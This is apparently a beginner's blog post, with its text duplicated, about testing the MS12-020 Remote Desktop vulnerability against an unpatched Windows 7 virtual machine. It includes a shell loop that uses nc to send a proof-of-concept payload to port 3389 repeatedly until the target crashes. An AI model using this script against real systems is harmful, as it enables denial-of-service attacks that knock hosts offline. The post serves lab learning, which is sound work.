I'm still relatively new to security and lately I've been trying out various exploits, one of them being the MS12-020 vulnerability in Remote Desktop.
The details of the vulnerability can be found here and the proof of concept code that can be used to exploit the vulnerability can be found here.
To test the proof-of-concept code I used a VM running Windows 7 Enterprise with no updates and a VM running Debian Linux 6 x64.
I wrote a short shell script to execute the exploit multiple times until the target machine crashed.
#!/bin/sh
while true;
do
echo `nc <SERVER IP> 3389 < termdd_1.dat`
done
Running the exploit:
Crashing the box:
It's a "script kiddie" exploit. But everyone has to start some where. :)
The details of the vulnerability can be found here and the proof of concept code that can be used to exploit the vulnerability can be found here.
To test the proof-of-concept code I used a VM running Windows 7 Enterprise with no updates and a VM running Debian Linux 6 x64.
I wrote a short shell script to execute the exploit multiple times until the target machine crashed.
#!/bin/sh
while true;
do
echo `nc <SERVER IP> 3389 < termdd_1.dat`
done
Running the exploit:
Crashing the box:
It's a "script kiddie" exploit. But everyone has to start some where. :)